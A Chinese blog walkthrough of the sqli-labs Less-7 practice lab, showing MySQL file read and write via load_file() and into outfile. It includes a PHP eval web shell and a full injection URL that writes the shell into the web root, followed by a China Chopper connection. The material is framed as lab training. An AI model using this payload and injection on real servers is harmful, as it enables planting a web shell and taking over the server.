码迷,mamicode.com
首页 > 数据库 > 详细

sqli lab less7

时间:2020-01-22 16:39:20      阅读:117      评论:0      收藏:0      [点我收藏+]

标签:eva   read   aix   show   图片   读取   ima   路径   ESS   

Less7

1.文件读写权限问题

  • show variables like ‘%secure%‘;查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开
  • C:\phpstudy\PHPTutorial\MySQL\my.ini文件,在其中加上一句:secure_file_priv=“/”。

 

 技术图片

 

 

 技术图片

 

 

 

 

 

 

重启服务再show  就显示了

 技术图片

 

 

   

 

2一句话木马:php版本:<?php @eval($_POST[“crow”]);?> 其中crow是密码

 

一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

3. load_file()  读取本地文件  select load_file(‘C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\test.txt’);

4. into outfile 写文件                                       

用法: select ‘mysql is very good‘ into outfile ‘test1.txt‘;

技术图片

                                                                     文件位置: C:\phpstudy\\MySQL\data

  •   或者是select ‘crow 666‘ into outfile ‘C:\\phpstudy\\WWW\\sqli\\Less-7\\test.txt’;
  •  
  • 文件位置: C:\phpstudy\WWW\sqli\Less-7
  • 注意事项: \\

 

 

 

 技术图片

 

 技术图片

 

 

 

 

 

 

有错误  证明存在注入

 

 技术图片

 

 

 

之后我们用outfile将一句话木马写入文件,虽然依然显示报错,但是我们发现路径下已经存在了我们想要的文件

http://192.168.50.100/sqli-labs/Less-7/?id=-1‘)) union select 1,2,‘<?php @eval($_POST[“crow”]);?>‘ into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.php" --+

技术图片

 

 

 

 技术图片

 

 

使用中国菜刀链接

 技术图片

 

 技术图片

 

 

 

使用中国菜刀访问即可

sqli lab less7

标签:eva   read   aix   show   图片   读取   ima   路径   ESS   

原文地址:https://www.cnblogs.com/xingyuner/p/12228551.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!